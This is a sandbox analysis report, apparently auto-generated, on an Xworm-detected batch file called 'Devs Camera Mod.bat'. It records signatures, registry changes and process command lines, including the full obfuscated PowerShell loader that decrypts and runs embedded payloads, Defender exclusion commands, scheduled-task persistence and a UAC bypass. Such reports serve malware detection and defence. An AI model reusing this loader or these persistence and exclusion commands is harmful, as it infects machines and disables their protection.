Analysis Overview
SHA256
b1e02899752b3e45311d824e70bed91652fcfae6ad24e42a8cd91741def5af92
Threat Level: Known bad
The file Devs Camera Mod.bat was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Detect Xworm Payload
Xworm
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Drops startup file
Deletes itself
Loads dropped DLL
Executes dropped EXE
UPX packed file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops file in System32 directory
Drops file in Program Files directory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of FindShellTrayWindow
System policy modification
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: AddClipboardFormatListener
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-04 04:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-04 04:24
Reported
2024-09-04 04:27
Platform
win7-20240708-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe |
| PID 2908 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe |
| PID 2908 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\net.exe |
| PID 2556 wrote to memory of 2408 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe |
| PID 2556 wrote to memory of 2408 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe |
| PID 2556 wrote to memory of 2408 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe |
| PID 2908 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2908 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2908 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7q3pYSfGwp6K6dlCFvkWbgtv/dBsW50RyMh5vQnsYG4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fsqAJFV1AROJcZz5keHA4A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NQmky=New-Object System.IO.MemoryStream(,$param_var); $KMpfA=New-Object System.IO.MemoryStream; $BQpzm=New-Object System.IO.Compression.GZipStream($NQmky, [IO.Compression.CompressionMode]::Decompress); $BQpzm.CopyTo($KMpfA); $BQpzm.Dispose(); $NQmky.Dispose(); $KMpfA.Dispose(); $KMpfA.ToArray();}function execute_function($param_var,$param2_var){ $nOAIs=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eOdYi=$nOAIs.EntryPoint; $eOdYi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat';$qnoql=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat').Split([Environment]::NewLine);foreach ($hbFVI in $qnoql) { if ($hbFVI.StartsWith(':: ')) { $icdoU=$hbFVI.Substring(3); break; }}$payloads_var=[string[]]$icdoU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
Files
memory/2592-4-0x000007FEF5EBE000-0x000007FEF5EBF000-memory.dmp
memory/2592-5-0x000000001B570000-0x000000001B852000-memory.dmp
memory/2592-6-0x0000000001F00000-0x0000000001F08000-memory.dmp
memory/2592-7-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2592-8-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2592-9-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2592-11-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2592-10-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2592-12-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-04 04:24
Reported
2024-09-04 04:42
Platform
win10v2004-20240802-en
Max time kernel
1050s
Max time network
1051s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dxipfm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\phduje.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3F17.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F586.tmp\eulascr.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Crashpad\metadata | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files\Crashpad\settings.dat | C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\ArcticBomb.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133698976374178104" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | C:\Windows\system32\wscript.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\wscript.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat"
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7q3pYSfGwp6K6dlCFvkWbgtv/dBsW50RyMh5vQnsYG4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fsqAJFV1AROJcZz5keHA4A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NQmky=New-Object System.IO.MemoryStream(,$param_var); $KMpfA=New-Object System.IO.MemoryStream; $BQpzm=New-Object System.IO.Compression.GZipStream($NQmky, [IO.Compression.CompressionMode]::Decompress); $BQpzm.CopyTo($KMpfA); $BQpzm.Dispose(); $NQmky.Dispose(); $KMpfA.Dispose(); $KMpfA.ToArray();}function execute_function($param_var,$param2_var){ $nOAIs=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eOdYi=$nOAIs.EntryPoint; $eOdYi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat';$qnoql=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Devs Camera Mod.bat').Split([Environment]::NewLine);foreach ($hbFVI in $qnoql) { if ($hbFVI.StartsWith(':: ')) { $icdoU=$hbFVI.Substring(3); break; }}$payloads_var=[string[]]$icdoU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_569_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_569.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_569.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_569.bat" "
C:\Windows\system32\net.exe
net file
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7q3pYSfGwp6K6dlCFvkWbgtv/dBsW50RyMh5vQnsYG4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fsqAJFV1AROJcZz5keHA4A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NQmky=New-Object System.IO.MemoryStream(,$param_var); $KMpfA=New-Object System.IO.MemoryStream; $BQpzm=New-Object System.IO.Compression.GZipStream($NQmky, [IO.Compression.CompressionMode]::Decompress); $BQpzm.CopyTo($KMpfA); $BQpzm.Dispose(); $NQmky.Dispose(); $KMpfA.Dispose(); $KMpfA.ToArray();}function execute_function($param_var,$param2_var){ $nOAIs=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eOdYi=$nOAIs.EntryPoint; $eOdYi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_569.bat';$qnoql=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_569.bat').Split([Environment]::NewLine);foreach ($hbFVI in $qnoql) { if ($hbFVI.StartsWith(':: ')) { $icdoU=$hbFVI.Substring(3); break; }}$payloads_var=[string[]]$icdoU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
C:\Users\Admin\AppData\Local\Temp\dxipfm.exe
"C:\Users\Admin\AppData\Local\Temp\dxipfm.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\3F17.tmp\3F18.tmp\3F19.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\3F17.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\3F17.tmp\eulascr.exe"
C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\phduje.exe
"C:\Users\Admin\AppData\Local\Temp\phduje.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\F586.tmp\F587.tmp\F588.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\F586.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\F586.tmp\eulascr.exe"
C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8f686cc40,0x7ff8f686cc4c,0x7ff8f686cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1868 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2124,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,4364280506639616988,3430423692957402500,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2436 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
